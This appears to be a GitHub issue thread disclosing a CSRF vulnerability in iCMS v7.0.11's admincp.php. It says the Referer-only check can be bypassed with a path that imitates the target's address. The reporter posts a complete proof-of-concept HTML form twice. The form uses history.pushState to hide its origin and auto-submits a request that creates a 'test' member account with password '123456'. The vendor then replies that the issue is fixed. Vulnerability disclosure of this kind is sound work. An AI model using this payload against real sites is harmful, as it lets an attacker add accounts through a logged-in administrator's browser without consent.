### ISSUE TITLE
Admincp.php has a CSRF

### ISSUE THREAD

**Issue by Fccarry** [idreamsoft/iCMS#35]
When verifying CSRF_TOKEN, if CSRF_TOKEN does not exist, only refere information is validated, which can be bypassed by path masking.

PAYLOAD
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.3.128/ICMS-v7.0.11/admincp.php?app=members&do=save&frame=iPH" method="POST">
      <input type="hidden" name="uid" value="0" />
      <input type="hidden" name="type" value="" />
      <input type="hidden" name="uname" value="test" />
      <input type="hidden" name="pwd" value="123456" />
      <input type="hidden" name="nickname" value="test" />
      <input type="hidden" name="realname" value="test" />
      <input type="hidden" name="info&#91;QQ&#93;" value="" />
      <input type="hidden" name="info&#91;blog&#93;" value="" />
      <input type="hidden" name="info&#91;year&#93;" value="" />
      <input type="hidden" name="info&#91;month&#93;" value="" />
      <input type="hidden" name="info&#91;day&#93;" value="" />
      <input type="hidden" name="info&#91;from&#93;" value="" />
      <input type="hidden" name="info&#91;sign&#93;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Put the HTML file in the camouflaged refere path:\192.168.3.128\ICMS\admincp.php\test.html
Submit data packets, refere information is：
Referer: http://192.168.3.130/192.168.3.128/iCMS/admincp.php/test.html
You can bypass refere validation
![image](https://user-images.githubusercontent.com/42264662/43944737-83fa8b6c-9cb2-11e8-999a-00d65a0a0732.png)

**Comment by Fccarry** [comment]
payload
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.3.128/ICMS-v7.0.11/admincp.php?app=members&do=save&frame=iPH" method="POST">
      <input type="hidden" name="uid" value="0" />
      <input type="hidden" name="type" value="" />
      <input type="hidden" name="uname" value="test" />
      <input type="hidden" name="pwd" value="123456" />
      <input type="hidden" name="nickname" value="test" />
      <input type="hidden" name="realname" value="test" />
      <input type="hidden" name="info&#91;QQ&#93;" value="" />
      <input type="hidden" name="info&#91;blog&#93;" value="" />
      <input type="hidden" name="info&#91;year&#93;" value="" />
      <input type="hidden" name="info&#91;month&#93;" value="" />
      <input type="hidden" name="info&#91;day&#93;" value="" />
      <input type="hidden" name="info&#91;from&#93;" value="" />
      <input type="hidden" name="info&#91;sign&#93;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

**Comment by idreamsoft** [comment]
已经修复了
